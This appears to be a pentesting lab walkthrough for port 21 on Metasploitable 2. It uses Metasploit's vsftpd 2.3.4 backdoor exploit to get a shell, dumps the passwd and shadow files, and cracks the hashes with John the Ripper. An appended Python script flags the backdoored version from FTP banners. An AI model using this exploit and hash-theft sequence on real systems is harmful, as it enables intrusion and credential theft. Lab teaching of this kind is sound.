Metasploitable 2: Port 21
In the previous article, Metasploitable 2 I — Lab Setup, I explained how to install and prepare Metasploitable 2 in a virtual environment for the purpose of pentesting.
I ended that article after running an nmap scan and the Metasploit SYN scan module:
Port 21 scan
In the picture above we can see a list of open ports. Our job as pentesters is to determine how secure (or not) the services running on those ports are. We’ll start with port 21, the default FTP port.
Within the Metasploit framework we’ll run an nmap service scan targeting port 21:
> db_nmap -p 21 192.168.231.109 -A -sV -sC
MSF also has an auxiliary module for FTP:
> use auxiliary/scanner/ftp/ftp_version
> run
Remember: the RHOSTS variable was set globally in the previous article.
Let’s view the results of our port scan:
We have an FTP server, specifically vsftpd 2.3.4, running. Let’s search Exploit-DB with searchsploit:
$ searchsploit vsftpd
As we can see, there is a backdoor command execution exploit for our version of vsftpd. Let’s go back to MSF, search for the exploit, load it, view its information and run it:
> grep vsftp search exploits
> use exploit/unix/ftp/vsftpd_234_backdoor
> show info
> run
And now we have a shell in session 2. We can send it to the background (^Z), list open sessions (sessions -l) and interact with one (sessions 2).
We’ll try to extract users and password hashes from the target using the hashdump post module. Put the session in the background and select the module:
> use post/linux/gather/hashdump
> show options
> set SESSION 2
> show info
> run
Now use the ‘loot’ command to see the results so far:
> loot
We were able to obtain the passwd, shadow and unshadowed hashes files.
Open another terminal and run John the Ripper against the unshadowed hashes file to crack them:
$ john .msf4/loot/20190402110303_metasploitable2_192.168.231.109_linux.hashes_935091.txt
To view results use the --show option:
Conclusion
Continuing where we left off in part I, we scanned port 21 and determined that a vulnerable version was running the FTP service. Using MSF we were able to:
- create a remote session,
- get the /etc/passwd and /etc/shadow files,
- obtain access credentials using John the Ripper.
We’ll keep probing Metasploitable 2 in the next articles.
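As an added defensive counterpart to the version identification step above (this is example code, not part of the original article): a small Python checker that parses FTP 220 greetings, flags the backdoored vsftpd 2.3.4 build the scan found, and sorts an inventory so the hosts that need action come first. The sample greetings, the known-bad set and the helper names are constructed assumptions.

```python
import re
import socket
# FTP releases known to ship a backdoor. vsftpd 2.3.4 is the build found on
# Metasploitable 2 above; the set itself is constructed for this example.
KNOWN_BACKDOORED = {("vsftpd", "2.3.4")}

# Product and version inside a 220 greeting, e.g. "220 (vsFTPd 2.3.4)".
BANNER_RE = re.compile(
    r"^220[ -].*?(?P<product>vsftpd|proftpd|pure-ftpd)\s*(?P<version>\d+(?:\.\d+)*)",
    re.IGNORECASE,
)

def parse_banner(banner):
    """Return (product, version) from an FTP greeting, or None if unrecognised."""
    m = BANNER_RE.search(banner.strip())
    if m is None:
        return None
    return (m.group("product").lower(), m.group("version"))

def assess(banner):
    """Classify one greeting as 'backdoored', 'ok' or 'unknown'."""
    parsed = parse_banner(banner)
    if parsed is None:
        return "unknown"
    return "backdoored" if parsed in KNOWN_BACKDOORED else "ok"

def audit(banners):
    """Map {host: greeting} to {host: verdict}, hosts needing action first."""
    order = {"backdoored": 0, "unknown": 1, "ok": 2}
    verdicts = {host: assess(b) for host, b in banners.items()}
    return dict(sorted(verdicts.items(), key=lambda kv: order[kv[1]]))

def grab_banner(host, port=21, timeout=3.0):
    """Read the greeting from a live host, then QUIT (not used by the sample)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        greeting = sock.recv(1024).decode("utf-8", "replace")
        sock.sendall(b"QUIT\r\n")
    return greeting

# Constructed sample greetings; the first is what Metasploitable 2 returns.
SAMPLE_BANNERS = {
    "192.168.231.109": "220 (vsFTPd 2.3.4)",
    "192.168.231.110": "220 (vsFTPd 3.0.3)",
    "192.168.231.111": "220 ProFTPD 1.3.5 Server (Debian)",
    "192.168.231.112": "220 Welcome",
}

if __name__ == "__main__":
    for host, verdict in audit(SAMPLE_BANNERS).items():
        print(f"{host:16} {verdict}")
```

To check a live lab host instead of the constructed sample, feed `grab_banner(host)` output into `assess`.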